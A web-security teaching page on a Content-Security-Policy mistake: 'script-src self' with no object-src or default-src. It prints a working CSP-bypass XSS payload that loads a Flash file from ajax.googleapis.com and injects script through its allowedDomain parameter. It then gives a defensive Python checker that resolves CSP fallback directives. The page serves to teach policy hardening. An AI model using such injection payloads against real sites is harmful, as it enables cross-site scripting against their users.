Mistake #3: script-src 'self';

Looks secure, but the policy has no object-src directive and no default-src for it to fall back on. <object> and <embed> loads are governed by object-src, not script-src, so a plugin file can be loaded from any origin. A Flash file embedded with AllowScriptAccess="always" may then execute JavaScript in the page, and the YUI charts.swf hosted on ajax.googleapis.com lets the attacker control that JavaScript: the injected allowedDomain value breaks out of the string the SWF builds and appends its own code. Flash no longer runs in current browsers, but the CSP lesson is unchanged: always set object-src 'none' (or a default-src) so no fetch directive is left unrestricted.

Bypass:

">'><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(12345)}//'><param name="AllowScriptAccess" value="always"></object>
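A quick way to catch this class of mistake before shipping a policy is to resolve, for each fetch directive, which source list actually governs it after the fallback chain is applied. The checker below is an added example written for this page, not code from the slides or any project; the policies it inspects are constructed inline, and it models the CSP Level 3 fallback order (object-src falls back only to default-src; frame-src and worker-src have extra hops).

```python
# Added example (not from the slide): a small Content-Security-Policy checker that
# reports which source list actually governs <object>/<embed> loads, applying the
# fallback chain the way browsers do. Policies are constructed inline for the demo.

from __future__ import annotations

# Fetch directives and the directives a browser consults when they are absent
# (CSP Level 3 order). Directives not listed here never fall back to default-src,
# e.g. base-uri, form-action, frame-ancestors.
FALLBACK_CHAIN: dict[str, list[str]] = {
    "script-src": ["default-src"],
    "style-src": ["default-src"],
    "img-src": ["default-src"],
    "font-src": ["default-src"],
    "connect-src": ["default-src"],
    "media-src": ["default-src"],
    "object-src": ["default-src"],
    "manifest-src": ["default-src"],
    "child-src": ["default-src"],
    "frame-src": ["child-src", "default-src"],
    "worker-src": ["child-src", "script-src", "default-src"],
}


def parse_csp(policy: str) -> dict[str, list[str]]:
    """Parse a CSP header value into {directive: [sources]}.

    Directive names are case-insensitive. When a directive is repeated,
    browsers honour the first occurrence and ignore the rest, so do we.
    """
    directives: dict[str, list[str]] = {}
    for chunk in policy.split(";"):
        tokens = chunk.split()
        if not tokens:
            continue
        name = tokens[0].lower()
        directives.setdefault(name, tokens[1:])
    return directives


def effective_sources(directives: dict[str, list[str]], name: str) -> tuple[list[str] | None, str | None]:
    """Return (source list, directive it came from) for `name`, walking the fallback chain.

    (None, None) means nothing in the policy restricts that kind of load at all.
    """
    for candidate in [name] + FALLBACK_CHAIN.get(name, []):
        if candidate in directives:
            return directives[candidate], candidate
    return None, None


def plugin_content_unrestricted(policy: str) -> bool:
    """True when <object>/<embed> may load from any origin: the slide's mistake #3.

    Either no directive governs object-src, or the governing list contains '*'.
    """
    sources, _ = effective_sources(parse_csp(policy), "object-src")
    return sources is None or "*" in sources


def explain(policy: str) -> str:
    """Human-readable verdict for the object-src situation of one policy."""
    sources, origin = effective_sources(parse_csp(policy), "object-src")
    if sources is None:
        return "object-src: UNRESTRICTED (no object-src and no default-src fallback)"
    return f"object-src: {' '.join(sources)} (from {origin})"


if __name__ == "__main__":
    WEAK = "script-src 'self';"                                              # the slide's policy
    FIXED = "script-src 'self'; object-src 'none';"                          # plugins blocked explicitly
    FIXED_DEFAULT = "default-src 'self'; script-src 'self' https://cdn.example"  # blocked via fallback
    for p in (WEAK, FIXED, FIXED_DEFAULT):
        print(f"{p!r:70} -> {explain(p)}")
```

Run it as a script to see the weak policy reported as unrestricted beside the two fixed variants; `plugin_content_unrestricted` is the function to wire into a CI check on your response headers.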